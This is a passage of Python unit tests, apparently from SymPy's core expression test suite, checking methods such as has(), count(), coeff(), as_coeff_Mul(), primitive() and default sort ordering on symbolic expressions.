    assert expr.find(sin) == set([sin(x), sin(sin(x))])
    assert expr.find(sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
def test_count():
    """count tallies matching subexpressions for the same query forms find takes."""
    expr = (x + y + 2 + sin(3*x))
    assert expr.count(lambda u: u.is_Integer) == 2
    assert expr.count(lambda u: u.is_Symbol) == 3
    assert expr.count(Integer) == 2
    assert expr.count(Symbol) == 3
    assert expr.count(2) == 1
    a = Wild('a')
    assert expr.count(sin) == 1
    assert expr.count(sin(a)) == 1
    assert expr.count(lambda u: type(u) is sin) == 1
def test_has_basics():
    """has() accepts symbols, function classes and type classes as queries."""
    f = Function('f')
    g = Function('g')
    p = Wild('p')
    assert sin(x).has(x)
    assert sin(x).has(sin)
    assert not sin(x).has(y)
    assert not sin(x).has(cos)
    assert f(x).has(x)
    assert f(x).has(f)
    assert not f(x).has(y)
    assert not f(x).has(g)
    assert f(x).diff(x).has(x)
    assert f(x).diff(x).has(f)
    assert f(x).diff(x).has(Derivative)
    assert not f(x).diff(x).has(y)
    assert not f(x).diff(x).has(g)
    assert not f(x).diff(x).has(sin)
    assert (x**2).has(Symbol)
    assert not (x**2).has(Wild)
    assert (2*p).has(Wild)
    # No arguments -> nothing to look for -> False.
    assert not x.has()
def test_has_multiple():
    """With several arguments, has() is True if ANY of them is present."""
    f = x**2*y + sin(2**t + log(z))
    assert f.has(x)
    assert f.has(y)
    assert f.has(z)
    assert f.has(t)
    assert not f.has(u)
    assert f.has(x, y, z, t)
    # u is absent but x is present, so the query still succeeds.
    assert f.has(x, y, z, t, u)
    i = Integer(4400)
    assert not i.has(x)
    assert (i*x**i).has(x)
    assert not (i*y**i).has(x)
    assert (i*y**i).has(x, y)
    assert not (i*y**i).has(x, z)
def test_has_piecewise():
    """has() searches every branch expression and condition of a Piecewise."""
    f = (x*y + 3/y)**(3 + 2)
    g = Function('g')
    h = Function('h')
    p = Piecewise((g(x), x < -1), (1, x <= 1), (f, True))
    assert p.has(x)
    assert p.has(y)
    assert not p.has(z)
    assert p.has(1)
    assert p.has(3)
    assert not p.has(4)
    assert p.has(f)
    assert p.has(g)
    assert not p.has(h)
def test_has_iterative():
    """has() matches sub-products; noncommutative factors must appear in order."""
    A, B, C = symbols('A,B,C', commutative=False)
    f = x*gamma(x)*sin(x)*exp(x*y)*A*B*C*cos(x*A*B)
    assert f.has(x)
    assert f.has(x*y)
    assert f.has(x*sin(x))
    assert not f.has(x*sin(y))
    assert f.has(x*A)
    assert f.has(x*A*B)
    # A*C skips B, so it is not a contiguous sub-product.
    assert not f.has(x*A*C)
    assert f.has(x*A*B*C)
    assert not f.has(x*A*C*B)
    assert f.has(x*sin(x)*A*B*C)
    assert not f.has(x*sin(x)*A*C*B)
    assert not f.has(x*sin(y)*A*B*C)
    assert f.has(x*gamma(x))
    assert not f.has(x + sin(x))
    # Boolean And supports sub-conjunction queries too.
    assert (x & y & z).has(x & z)
def test_has_integrals():
    """has() finds sub-sums/products inside an Integral's body and limits."""
    f = Integral(x**2 + sin(x*y*z), (x, 0, x + y + z))
    assert f.has(x + y)
    assert f.has(x + z)
    assert f.has(y + z)
    assert f.has(x*y)
    assert f.has(x*z)
    assert f.has(y*z)
    assert not f.has(2*x + y)
    assert not f.has(2*x*y)
def test_has_tuple():
    """has() descends into Tuple elements."""
    f = Function('f')
    g = Function('g')
    h = Function('h')
    assert Tuple(x, y).has(x)
    assert not Tuple(x, y).has(z)
    assert Tuple(f(x), g(x)).has(x)
    assert not Tuple(f(x), g(x)).has(y)
    assert Tuple(f(x), g(x)).has(f)
    assert Tuple(f(x), g(x)).has(f(x))
    assert not Tuple(f, g).has(x)
    assert Tuple(f, g).has(f)
    assert not Tuple(f, g).has(h)
    assert Tuple(True).has(True) is True  # .has(1) will also be True
def test_has_units():
    """has() works on expressions that carry physical units."""
    from sympy.physics.units import m, s
    assert (x*m/s).has(x)
    assert (x*m/s).has(y, z) is False
def test_has_polys():
    """Poly.has sees generators and symbols buried in the coefficients."""
    poly = Poly(x**2 + x*y*sin(z), x, y, t)
    for query in ((x,), (x, y, z), (x, y, z, t)):
        assert poly.has(*query)
def test_has_physics():
    """has() descends into physics objects such as FockState."""
    assert FockState((x, y)).has(x)
def test_as_poly_as_expr():
    """as_poly/as_expr round-trip; non-polynomial input gives None."""
    f = x**2 + 2*x*y
    assert f.as_poly().as_expr() == f
    assert f.as_poly(x, y).as_expr() == f
    assert (f + sin(x)).as_poly(x, y) is None
    p = Poly(f, x, y)
    assert p.as_poly() == p
def test_nonzero():
    """bool() of an expression is False exactly when it evaluates to zero."""
    for truthy in (S.One, x, x + y, x*y, x*1):
        assert bool(truthy) is True
    for falsy in (S.Zero, x - x, x*0):
        assert bool(falsy) is False
def test_is_number():
    """is_number is True iff the expression contains no free symbols
    (after trivial simplification), and defaults to False on bare Basic."""
    assert Float(3.14).is_number is True
    assert Integer(737).is_number is True
    assert Rational(3, 2).is_number is True
    assert Rational(8).is_number is True
    assert x.is_number is False
    assert (2*x).is_number is False
    assert (x + y).is_number is False
    assert log(2).is_number is True
    assert log(x).is_number is False
    assert (2 + log(2)).is_number is True
    assert (8 + log(2)).is_number is True
    assert (2 + log(x)).is_number is False
    assert (8 + log(2) + x).is_number is False
    # x**2/x - x simplifies to 0, leaving no free symbols.
    assert (1 + x**2/x - x).is_number is True
    assert Tuple(Integer(1)).is_number is False
    assert Add(2, x).is_number is False
    assert Mul(3, 4).is_number is True
    assert Pow(log(2), 2).is_number is True
    assert oo.is_number is True
    g = WildFunction('g')
    assert g.is_number is False
    assert (2*g).is_number is False
    assert (x**2).subs(x, 3).is_number is True
    # test extensibility of .is_number
    # on subinstances of Basic
    class A(Basic):
        pass
    a = A()
    assert a.is_number is False
def test_as_coeff_add():
    """as_coeff_add splits off the Rational term of a sum without expanding."""
    assert S(2).as_coeff_add() == (2, ())
    # Floats are NOT treated as the rational coefficient.
    assert S(3.0).as_coeff_add() == (0, (S(3.0),))
    assert S(-3.0).as_coeff_add() == (0, (S(-3.0),))
    assert x.as_coeff_add() == (0, (x,))
    assert (x - 1).as_coeff_add() == (-1, (x,))
    assert (x + 1).as_coeff_add() == (1, (x,))
    assert (x + 2).as_coeff_add() == (2, (x,))
    assert (x + y).as_coeff_add(y) == (x, (y,))
    assert (3*x).as_coeff_add(y) == (3*x, ())
    # don't do expansion
    e = (x + y)**2
    assert e.as_coeff_add(y) == (0, (e,))
def test_as_coeff_mul():
    """as_coeff_mul splits off the Rational factor of a product; rational=False
    also pulls out Float coefficients."""
    assert S(2).as_coeff_mul() == (2, ())
    # By default only the sign of a Float is extracted.
    assert S(3.0).as_coeff_mul() == (1, (S(3.0),))
    assert S(-3.0).as_coeff_mul() == (-1, (S(3.0),))
    assert S(-3.0).as_coeff_mul(rational=False) == (-S(3.0), ())
    assert x.as_coeff_mul() == (1, (x,))
    assert (-x).as_coeff_mul() == (-1, (x,))
    assert (2*x).as_coeff_mul() == (2, (x,))
    assert (x*y).as_coeff_mul(y) == (x, (y,))
    assert (3 + x).as_coeff_mul() == (1, (3 + x,))
    assert (3 + x).as_coeff_mul(y) == (3 + x, ())
    # don't do expansion
    e = exp(x + y)
    assert e.as_coeff_mul(y) == (1, (e,))
    e = 2**(x + y)
    assert e.as_coeff_mul(y) == (1, (e,))
    assert (1.1*x).as_coeff_mul(rational=False) == (1.1, (x,))
    assert (1.1*x).as_coeff_mul() == (1, (1.1, x))
    assert (-oo*x).as_coeff_mul(rational=True) == (-1, (oo, x))
def test_as_coeff_exponent():
    """as_coeff_exponent(x) factors an expression as coeff*x**exp."""
    assert (3*x**4).as_coeff_exponent(x) == (3, 4)
    assert (2*x**3).as_coeff_exponent(x) == (2, 3)
    assert (4*x**2).as_coeff_exponent(x) == (4, 2)
    assert (6*x**1).as_coeff_exponent(x) == (6, 1)
    assert (3*x**0).as_coeff_exponent(x) == (3, 0)
    assert (2*x**0).as_coeff_exponent(x) == (2, 0)
    assert (1*x**0).as_coeff_exponent(x) == (1, 0)
    assert (0*x**0).as_coeff_exponent(x) == (0, 0)
    assert (-1*x**0).as_coeff_exponent(x) == (-1, 0)
    assert (-2*x**0).as_coeff_exponent(x) == (-2, 0)
    assert (2*x**3 + pi*x**3).as_coeff_exponent(x) == (2 + pi, 3)
    assert (x*log(2)/(2*x + pi*x)).as_coeff_exponent(x) == \
        (log(2)/(2 + pi), 0)
    # issue 4784
    # An unevaluated Derivative counts as x-free: exponent 0.
    D = Derivative
    f = Function('f')
    fx = D(f(x), x)
    assert fx.as_coeff_exponent(f(x)) == (fx, 0)
def test_extractions():
    """extract_multiplicatively/extract_additively return the cofactor/remainder
    or None; could_extract_minus_sign reports whether -1 can be pulled out."""
    assert ((x*y)**3).extract_multiplicatively(x**2 * y) == x*y**2
    assert ((x*y)**3).extract_multiplicatively(x**4 * y) is None
    assert (2*x).extract_multiplicatively(2) == x
    assert (2*x).extract_multiplicatively(3) is None
    assert (2*x).extract_multiplicatively(-1) is None
    assert (Rational(1, 2)*x).extract_multiplicatively(3) == x/6
    assert (sqrt(x)).extract_multiplicatively(x) is None
    assert (sqrt(x)).extract_multiplicatively(1/x) is None
    assert x.extract_multiplicatively(-x) is None
    assert ((x*y)**3).extract_additively(1) is None
    assert (x + 1).extract_additively(x) == 1
    assert (x + 1).extract_additively(2*x) is None
    assert (x + 1).extract_additively(-x) is None
    assert (-x + 1).extract_additively(2*x) is None
    assert (2*x + 3).extract_additively(x) == x + 3
    assert (2*x + 3).extract_additively(2) == 2*x + 1
    assert (2*x + 3).extract_additively(3) == 2*x
    assert (2*x + 3).extract_additively(-2) is None
    assert (2*x + 3).extract_additively(3*x) is None
    assert (2*x + 3).extract_additively(2*x) == 3
    assert x.extract_additively(0) == x
    assert S(2).extract_additively(x) is None
    assert S(2.).extract_additively(2) == S.Zero
    assert S(2*x + 3).extract_additively(x + 1) == x + 2
    assert S(2*x + 3).extract_additively(y + 1) is None
    assert S(2*x - 3).extract_additively(x + 1) is None
    assert S(2*x - 3).extract_additively(y + z) is None
    assert ((a + 1)*x*4 + y).extract_additively(x).expand() == \
        4*a*x + 3*x + y
    assert ((a + 1)*x*4 + 3*y).extract_additively(x + 2*y).expand() == \
        4*a*x + 3*x + y
    assert (y*(x + 1)).extract_additively(x + 1) is None
    assert ((y + 1)*(x + 1) + 3).extract_additively(x + 1) == \
        y*(x + 1) + 3
    assert ((x + y)*(x + 1) + x + y + 3).extract_additively(x + y) == \
        x*(x + y) + 3
    assert (x + y + 2*((x + y)*(x + 1)) + 3).extract_additively((x + y)*(x + 1)) == \
        x + y + (x + 1)*(x + y) + 3
    assert ((y + 1)*(x + 2*y + 1) + 3).extract_additively(y + 1) == \
        (x + 2*y)*(y + 1) + 3
    n = Symbol("n", integer=True)
    assert (Integer(-3)).could_extract_minus_sign() is True
    # For sign-symmetric pairs, exactly one of the two forms extracts a minus.
    assert (-n*x + x).could_extract_minus_sign() != \
        (n*x - x).could_extract_minus_sign()
    assert (x - y).could_extract_minus_sign() != \
        (-x + y).could_extract_minus_sign()
    assert (1 - x - y).could_extract_minus_sign() is True
    assert (1 - x + y).could_extract_minus_sign() is False
    assert ((-x - x*y)/y).could_extract_minus_sign() is True
    assert (-(x + x*y)/y).could_extract_minus_sign() is True
    assert ((x + x*y)/(-y)).could_extract_minus_sign() is True
    assert ((x + x*y)/y).could_extract_minus_sign() is False
    assert (x*(-x - x**3)).could_extract_minus_sign() is True
    assert ((-x - y)/(x + y)).could_extract_minus_sign() is True
    # The results of each of these will vary on different machines, e.g.
    # the first one might be False and the other (then) is true or vice versa,
    # so both are included.
    assert ((-x - y)/(x - y)).could_extract_minus_sign() is False or \
        ((-x - y)/(y - x)).could_extract_minus_sign() is False
    assert (x - y).could_extract_minus_sign() is False
    assert (-x + y).could_extract_minus_sign() is True
def test_coeff():
    """coeff(term[, n]) returns the coefficient of term**n (term itself for
    n=1); noncommutative products use left/right extraction via `right`."""
    assert (x + 1).coeff(x + 1) == 1
    assert (3*x).coeff(0) == 0
    assert (z*(1 + x)*x**2).coeff(1 + x) == z*x**2
    assert (1 + 2*x*x**(1 + x)).coeff(x*x**(1 + x)) == 2
    assert (1 + 2*x**(y + z)).coeff(x**(y + z)) == 2
    assert (3 + 2*x + 4*x**2).coeff(1) == 0
    assert (3 + 2*x + 4*x**2).coeff(-1) == 0
    assert (3 + 2*x + 4*x**2).coeff(x) == 2
    assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
    assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
    assert (-x/8 + x*y).coeff(x) == -S(1)/8 + y
    assert (-x/8 + x*y).coeff(-x) == S(1)/8
    # The queried term must divide exactly, not merely share a factor.
    assert (4*x).coeff(2*x) == 0
    assert (2*x).coeff(2*x) == 1
    assert (-oo*x).coeff(x*oo) == -1
    assert (10*x).coeff(x, 0) == 0
    assert (10*x).coeff(10*x, 0) == 0
    n1, n2 = symbols('n1 n2', commutative=False)
    assert (n1*n2).coeff(n1) == 1
    assert (n1*n2).coeff(n2) == n1
    assert (n1*n2 + x*n1).coeff(n1) == 1  # 1*n1*(n2+x)
    assert (n2*n1 + x*n1).coeff(n1) == n2 + x
    assert (n2*n1 + x*n1**2).coeff(n1) == n2
    assert (n1**x).coeff(n1) == 0
    assert (n1*n2 + n2*n1).coeff(n1) == 0
    # right selects the factor on the other side of the matched term.
    assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=1) == n2
    assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=0) == 2
    f = Function('f')
    assert (2*f(x) + 3*f(x).diff(x)).coeff(f(x)) == 2
    expr = z*(x + y)**2
    expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
    assert expr.coeff(z) == (x + y)**2
    assert expr.coeff(x + y) == 0
    assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
    assert (x + y + 3*z).coeff(1) == x + y
    assert (-x + 2*y).coeff(-1) == x
    assert (x - 2*y).coeff(-1) == 2*y
    assert (3 + 2*x + 4*x**2).coeff(1) == 0
    assert (-x - 2*y).coeff(2) == -y
    assert (x + sqrt(2)*x).coeff(sqrt(2)) == x
    assert (3 + 2*x + 4*x**2).coeff(x) == 2
    assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
    assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
    assert (z*(x + y)**2).coeff((x + y)**2) == z
    assert (z*(x + y)**2).coeff(x + y) == 0
    assert (2 + 2*x + (x + 1)*y).coeff(x + 1) == y
    assert (x + 2*y + 3).coeff(1) == x
    # n=0 collects everything free of the queried term.
    assert (x + 2*y + 3).coeff(x, 0) == 2*y + 3
    assert (x**2 + 2*y + 3*x).coeff(x**2, 0) == 2*y + 3*x
    assert x.coeff(0, 0) == 0
    assert x.coeff(x, 0) == 0
    n, m, o, l = symbols('n m o l', commutative=False)
    assert n.coeff(n) == 1
    assert y.coeff(n) == 0
    assert (3*n).coeff(n) == 3
    assert (2 + n).coeff(x*m) == 0
    assert (2*x*n*m).coeff(x) == 2*n*m
    assert (2 + n).coeff(x*m*n + y) == 0
    assert (2*x*n*m).coeff(3*n) == 0
    assert (n*m + m*n*m).coeff(n) == 1 + m
    assert (n*m + m*n*m).coeff(n, right=True) == m  # = (1 + m)*n*m
    assert (n*m + m*n).coeff(n) == 0
    assert (n*m + o*m*n).coeff(m*n) == o
    assert (n*m + o*m*n).coeff(m*n, right=1) == 1
    assert (n*m + n*m*n).coeff(n*m, right=1) == 1 + n  # = n*m*(n + 1)
def test_coeff2():
    """coeff picks out the factor of the first derivative in an expanded
    radial-operator expression."""
    r, kappa = symbols('r, kappa')
    psi = Function("psi")
    radial = (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2)) / r**2
    radial = radial.expand()
    assert radial.coeff(psi(r).diff(r)) == 2/r
def test_coeff2_0():
    """coeff of the second derivative in the expanded radial operator is 1."""
    r, kappa = symbols('r, kappa')
    psi = Function("psi")
    radial = (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2)) / r**2
    radial = radial.expand()
    assert radial.coeff(psi(r).diff(r, 2)) == 1
def test_coeff_expand():
    """coeff(z) returns the full unexpanded cofactor, per addend."""
    base = z*(x + y)**2
    assert base.coeff(z) == (x + y)**2
    combined = base + z*(2*x + 2*y)**2
    assert combined.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
def test_integrate():
    """Expr.integrate supports indefinite and definite forms."""
    assert x.integrate(x) == x**2/2          # indefinite
    assert x.integrate((x, 0, 1)) == S(1)/2  # definite over [0, 1]
def test_as_base_exp():
    """Non-Pow expressions report themselves with exponent 1; Pow splits."""
    for expr in (x, x*y*z, x + y + z):
        assert expr.as_base_exp() == (expr, S.One)
    assert ((x + y)**z).as_base_exp() == (x + y, z)
def test_issue_4963():
    """is_commutative must exist even on unevaluated Mul/Pow nodes."""
    assert hasattr(Mul(x, y), "is_commutative")
    assert hasattr(Mul(x, y, evaluate=False), "is_commutative")
    assert hasattr(Pow(x, y), "is_commutative")
    assert hasattr(Pow(x, y, evaluate=False), "is_commutative")
    expr = Mul(Pow(2, 2, evaluate=False), 3, evaluate=False) + 1
    assert hasattr(expr, "is_commutative")
def test_action_verbs():
    """Each simplification function has an equivalent Expr method."""
    assert nsimplify((1/(exp(3*pi*x/5) + 1))) == \
        (1/(exp(3*pi*x/5) + 1)).nsimplify()
    assert ratsimp(1/x + 1/y) == (1/x + 1/y).ratsimp()
    assert trigsimp(log(x), deep=True) == (log(x)).trigsimp(deep=True)
    assert radsimp(1/(2 + sqrt(2))) == (1/(2 + sqrt(2))).radsimp()
    assert powsimp(x**y*x**z*y**z, combine='all') == \
        (x**y*x**z*y**z).powsimp(combine='all')
    assert simplify(x**y*x**z*y**z) == (x**y*x**z*y**z).simplify()
    assert together(1/x + 1/y) == (1/x + 1/y).together()
    assert collect(a*x**2 + b*x**2 + a*x - b*x + c, x) == \
        (a*x**2 + b*x**2 + a*x - b*x + c).collect(x)
    assert apart(y/(y + 2)/(y + 1), y) == (y/(y + 2)/(y + 1)).apart(y)
    assert combsimp(y/(x + 2)/(x + 1)) == (y/(x + 2)/(x + 1)).combsimp()
    assert factor(x**2 + 5*x + 6) == (x**2 + 5*x + 6).factor()
    assert refine(sqrt(x**2)) == sqrt(x**2).refine()
    assert cancel((x**2 + 5*x + 6)/(x + 2)) == ((x**2 + 5*x + 6)/(x + 2)).cancel()
def test_as_powers_dict():
    """as_powers_dict maps each base to its exponent; missing keys give 0."""
    assert x.as_powers_dict() == {x: 1}
    assert (x**y*z).as_powers_dict() == {x: y, z: 1}
    # Repeated unevaluated factors accumulate in the exponent.
    assert Mul(2, 2, evaluate=False).as_powers_dict() == {S(2): S(2)}
    assert (x*y).as_powers_dict()[z] == 0
    assert (x + y).as_powers_dict()[z] == 0
def test_as_coefficients_dict():
    """as_coefficients_dict maps each term to its numeric coefficient;
    missing keys give 0."""
    check = [S(1), x, y, x*y, 1]
    assert [Add(3*x, 2*x, y, 3).as_coefficients_dict()[i] for i in check] == \
        [3, 5, 1, 0, 3]
    assert [(3*x*y).as_coefficients_dict()[i] for i in check] == \
        [0, 0, 0, 3, 0]
    # A Float coefficient stays attached to the term.
    assert (3.0*x*y).as_coefficients_dict()[3.0*x*y] == 1
def test_args_cnc():
    """args_cnc splits factors into [commutative, noncommutative] lists;
    cset=True returns the commutative part as a set (warning on duplicates)."""
    A = symbols('A', commutative=False)
    assert (x + A).args_cnc() == \
        [[], [x + A]]
    assert (x + a).args_cnc() == \
        [[a + x], []]
    assert (x*a).args_cnc() == \
        [[a, x], []]
    assert (x*y*A*(A + 1)).args_cnc(cset=True) == \
        [set([x, y]), [A, 1 + A]]
    assert Mul(x, x, evaluate=False).args_cnc(cset=True, warn=False) == \
        [set([x]), []]
    assert Mul(x, x**2, evaluate=False).args_cnc(cset=True, warn=False) == \
        [set([x, x**2]), []]
    # Duplicates with warn left on (the default) raise.
    raises(ValueError, lambda: Mul(x, x, evaluate=False).args_cnc(cset=True))
    assert Mul(x, y, x, evaluate=False).args_cnc() == \
        [[x, y, x], []]
    # always split -1 from leading number
    assert (-1.*x).args_cnc() == [[-1, 1.0, x], []]
def test_new_rawargs():
    """_new_rawargs rebuilds a node from raw args, recomputing commutativity
    unless reeval=False; a single arg collapses to that arg."""
    n = Symbol('n', commutative=False)
    a = x + n
    assert a.is_commutative is False
    assert a._new_rawargs(x).is_commutative
    assert a._new_rawargs(x, y).is_commutative
    assert a._new_rawargs(x, n).is_commutative is False
    assert a._new_rawargs(x, y, n).is_commutative is False
    m = x*n
    assert m.is_commutative is False
    assert m._new_rawargs(x).is_commutative
    assert m._new_rawargs(n).is_commutative is False
    assert m._new_rawargs(x, y).is_commutative
    assert m._new_rawargs(x, n).is_commutative is False
    assert m._new_rawargs(x, y, n).is_commutative is False
    # reeval=False keeps the original (noncommutative) flag.
    assert m._new_rawargs(x, n, reeval=False).is_commutative is False
    assert m._new_rawargs(S.One) is S.One
def test_issue_5226():
    """Empty Add/Mul yield their identities; unevaluated Mul of one Add
    keeps the Add structure."""
    assert Add(evaluate=False) == 0
    assert Mul(evaluate=False) == 1
    assert Mul(x + y, evaluate=False).is_Add
def test_free_symbols():
    # free_symbols should return the free symbols of an object
    """Bound (integration) variables are excluded; units carry no symbols."""
    assert S(1).free_symbols == set()
    assert (x).free_symbols == set([x])
    # x is bound by the integration limits; only y remains free.
    assert Integral(x, (x, 1, y)).free_symbols == set([y])
    assert (-Integral(x, (x, 1, y))).free_symbols == set([y])
    assert meter.free_symbols == set()
    assert (meter**x).free_symbols == set([x])
def test_issue_5300():
    """sqrt ratios still simplify when attached to a noncommutative symbol."""
    nc = Symbol('x', commutative=False)
    assert nc*sqrt(2)/sqrt(6) == nc*sqrt(3)/3
def test_as_coeff_Mul():
    """as_coeff_Mul splits off the leading Number factor (Float included)."""
    assert Integer(3).as_coeff_Mul() == (Integer(3), Integer(1))
    assert Rational(3, 4).as_coeff_Mul() == (Rational(3, 4), Integer(1))
    assert Float(5.0).as_coeff_Mul() == (Float(5.0), Integer(1))
    assert (Integer(3)*x).as_coeff_Mul() == (Integer(3), x)
    assert (Rational(3, 4)*x).as_coeff_Mul() == (Rational(3, 4), x)
    assert (Float(5.0)*x).as_coeff_Mul() == (Float(5.0), x)
    assert (Integer(3)*x*y).as_coeff_Mul() == (Integer(3), x*y)
    assert (Rational(3, 4)*x*y).as_coeff_Mul() == (Rational(3, 4), x*y)
    assert (Float(5.0)*x*y).as_coeff_Mul() == (Float(5.0), x*y)
    assert (x).as_coeff_Mul() == (S.One, x)
    assert (x*y).as_coeff_Mul() == (S.One, x*y)
    # rational=True extracts only the sign from an infinite coefficient.
    assert (-oo*x).as_coeff_Mul(rational=True) == (-1, oo*x)
def test_as_coeff_Add():
    """as_coeff_Add splits off the leading Number term (Float included)."""
    assert Integer(3).as_coeff_Add() == (Integer(3), Integer(0))
    assert Rational(3, 4).as_coeff_Add() == (Rational(3, 4), Integer(0))
    assert Float(5.0).as_coeff_Add() == (Float(5.0), Integer(0))
    assert (Integer(3) + x).as_coeff_Add() == (Integer(3), x)
    assert (Rational(3, 4) + x).as_coeff_Add() == (Rational(3, 4), x)
    assert (Float(5.0) + x).as_coeff_Add() == (Float(5.0), x)
    assert (Integer(3) + x + y).as_coeff_Add() == (Integer(3), x + y)
    assert (Rational(3, 4) + x + y).as_coeff_Add() == (Rational(3, 4), x + y)
    assert (Float(5.0) + x + y).as_coeff_Add() == (Float(5.0), x + y)
    assert (x).as_coeff_Add() == (S.Zero, x)
    assert (x*y).as_coeff_Add() == (S.Zero, x*y)
def test_expr_sorting():
    """default_sort_key orders mixed expressions, containers and Dummies stably.

    Each ``exprs`` list is written pre-sorted; sorting with default_sort_key
    must reproduce it unchanged.
    """
    f, g = symbols('f,g', cls=Function)
    exprs = [1/x**2, 1/x, sqrt(sqrt(x)), sqrt(x), x, sqrt(x)**3, x**2]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [x, 2*x, 2*x**2, 2*x**3, x**n, 2*x**n, sin(x), sin(x)**n,
             sin(x**2), cos(x), cos(x**2), tan(x)]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [x + 1, x**2 + x + 1, x**3 + x**2 + x + 1]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [S(4), x - 3*I/2, x + 3*I/2, x - 4*I + 1, x + 4*I + 1]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [f(x), g(x), exp(x), sin(x), cos(x), factorial(x)]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [Tuple(x, y), Tuple(x, z), Tuple(x, y, z)]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [[3], [1, 2]]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [[1, 2], [2, 3]]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [[1, 2], [1, 2, 3]]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [{x: -y}, {x: y}]
    assert sorted(exprs, key=default_sort_key) == exprs
    exprs = [set([1]), set([1, 2])]
    assert sorted(exprs, key=default_sort_key) == exprs
    # two same-named Dummies are distinct objects but sort deterministically
    a, b = exprs = [Dummy('x'), Dummy('x')]
    assert sorted([b, a], key=default_sort_key) == exprs
def test_as_ordered_factors():
    """as_ordered_factors lists Mul factors in canonical (sorted) order."""
    f, g = symbols('f,g', cls=Function)
    assert x.as_ordered_factors() == [x]
    assert (2*x*x**n*sin(x)*cos(x)).as_ordered_factors() \
        == [Integer(2), x, x**n, sin(x), cos(x)]
    args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
    expr = Mul(*args)
    assert expr.as_ordered_factors() == args
    # noncommutative factors must keep their original order
    A, B = symbols('A,B', commutative=False)
    assert (A*B).as_ordered_factors() == [A, B]
    assert (B*A).as_ordered_factors() == [B, A]
def test_as_ordered_terms():
    """as_ordered_terms lists Add terms in canonical order, honoring ``order=``."""
    f, g = symbols('f,g', cls=Function)
    assert x.as_ordered_terms() == [x]
    assert (sin(x)**2*cos(x) + sin(x)*cos(x)**2 + 1).as_ordered_terms() \
        == [sin(x)**2*cos(x), sin(x)*cos(x)**2, 1]
    args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
    expr = Add(*args)
    assert expr.as_ordered_terms() == args
    assert (1 + 4*sqrt(3)*pi*x).as_ordered_terms() == [4*pi*x*sqrt(3), 1]
    # complex constants: real part first, then imaginary part
    assert ( 2 + 3*I).as_ordered_terms() == [2, 3*I]
    assert (-2 + 3*I).as_ordered_terms() == [-2, 3*I]
    assert ( 2 - 3*I).as_ordered_terms() == [2, -3*I]
    assert (-2 - 3*I).as_ordered_terms() == [-2, -3*I]
    assert ( 4 + 3*I).as_ordered_terms() == [4, 3*I]
    assert (-4 + 3*I).as_ordered_terms() == [-4, 3*I]
    assert ( 4 - 3*I).as_ordered_terms() == [4, -3*I]
    assert (-4 - 3*I).as_ordered_terms() == [-4, -3*I]
    # explicit monomial orders for a bivariate polynomial
    f = x**2*y**2 + x*y**4 + y + 2
    assert f.as_ordered_terms(order="lex") == [x**2*y**2, x*y**4, y, 2]
    assert f.as_ordered_terms(order="grlex") == [x*y**4, x**2*y**2, y, 2]
    assert f.as_ordered_terms(order="rev-lex") == [2, y, x*y**4, x**2*y**2]
    assert f.as_ordered_terms(order="rev-grlex") == [2, y, x**2*y**2, x*y**4]
def test_sort_key_atomic_expr():
    """sort_key works on atomic unit expressions (negated unit sorts first)."""
    from sympy.physics.units import m, s
    assert sorted([-m, s], key=lambda arg: arg.sort_key()) == [-m, s]
def test_issue_4199():
    """_eval_interval propagates NaN and handles Heaviside integrands."""
    # first subs and limit gives NaN
    a = x/y
    assert a._eval_interval(x, 0, oo)._eval_interval(y, oo, 0) is S.NaN
    # second subs and limit gives NaN
    assert a._eval_interval(x, 0, oo)._eval_interval(y, 0, oo) is S.NaN
    # difference gives S.NaN
    a = x - y
    assert a._eval_interval(x, 1, oo)._eval_interval(y, oo, 1) is S.NaN
    # both endpoints missing is an error
    raises(ValueError, lambda: x._eval_interval(x, None, None))
    a = -y*Heaviside(x - y)
    assert a._eval_interval(x, -oo, oo) == -y
    assert a._eval_interval(x, oo, -oo) == y
def test_primitive():
    """primitive() extracts the positive rational content of an expression."""
    assert (3*(x + 1)**2).primitive() == (3, (x + 1)**2)
    assert (6*x + 2).primitive() == (2, 3*x + 1)
    assert (x/2 + 3).primitive() == (S(1)/2, x + 6)
    # unevaluated products/powers are not expanded, so content stays 1
    eq = (6*x + 2)*(x/2 + 3)
    assert eq.primitive()[0] == 1
    eq = (2 + 2*x)**2
    assert eq.primitive()[0] == 1
    # a lone Float contributes no rational content ...
    assert (4.0*x).primitive() == (1, 4.0*x)
    # ... but a rational term alongside it still factors out
    assert (4.0*x + y/2).primitive() == (S.Half, 8.0*x + y)
    assert (-2*x).primitive() == (2, -x)
    assert Add(5*z/7, 0.5*x, 3*y/2, evaluate=False).primitive() == \
        (S(1)/14, 7.0*x + 21*y + 10*z)
    # infinities pass through untouched
    for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
        assert (i + x/3).primitive() == \
            (S(1)/3, i + x)
    assert (S.Infinity + 2*x/3 + 4*y/7).primitive() == \
        (S(1)/21, 14*x + 12*y + oo)
    assert S.Zero.primitive() == (S.One, S.Zero)
def test_issue_5843():
    """extract_multiplicatively handles non-atomic (Add) divisors."""
    a = 1 + x
    assert (2*a).extract_multiplicatively(a) == 2
